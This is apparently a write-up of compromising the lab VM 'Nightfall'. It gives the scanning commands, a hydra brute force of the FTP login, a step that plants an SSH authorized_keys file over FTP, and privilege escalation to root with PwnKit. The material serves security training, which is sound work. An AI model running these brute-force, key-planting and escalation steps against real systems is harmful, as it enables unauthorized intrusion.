To begin, after the VM is installed, I ran the below command to find the IP:

sudo netdiscover -r 10.10.10.0/24

Once I found the IP, I began my usual enumeration scans.

sudo nmap -sS -p- -sV 10.10.10.37 –open

sudo nmap -sU 10.10.10.37 –open

From the nmap scans, I discovered the below information:

PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
MAC Address: 08:00:27:64:28:DE (Oracle VirtualBox virtual NIC)
Service Info: Host: NIGHTFALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.72 seconds

Seeing port 80 open, I ran the below to enumerate the web interface:

dirb http://10.10.10.37

gobuster dir -u http://10.10.10.37 -x html,txt,php,bak –wordlist=/usr/share/wordlists/dirb/common.txt

nikto -h 10.10.10.37

This turned up nothing useful, as even the webpage itself was the default Apache page.

Seeing another possible avenue, I also noticed the machine should have Samba shares enabled. I ran the below to enumerate that service:

enum4linux 10.10.10.37

The only shares available were IPC$ and PRINT$, which are inaccessible. However, it did give me some other valuable information, the usernames of matt and nightfall.

Using hydra, I attempted to find passwords for these usernames as well as root against the mysql service.

hydra -l matt -P /usr/share/wordlists/rockyou.txt mysql://10.10.10.37:3306

This turned up nothing, so instead I ran the same against the FTP service.

hydra -l matt -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.37

This was fruitful, and found the password of cheese.

Using this, I was able to connect to the FTP service, which I quickly found was Matt’s home directory. Nothing useful was found in here, however I did have full access to upload and download.

I created a .ssh directory, and within it pasted my public ssh key into an authorized_keys file. I then send this to matt’s home directory via FTP.

Once done, I could ssh into the machine as Matt, without a password.

After my usual enumeration steps, I found after checking for SUIDs this machine was running pkexec and polkit as SUID. In addition, the OS is Debian 10. Just as in the previous machine, Dusk, I transferred over PwnKit and ran it to get a root shell.

My apologies on the lack of pictures in this walkthrough, the next ones posted should have more.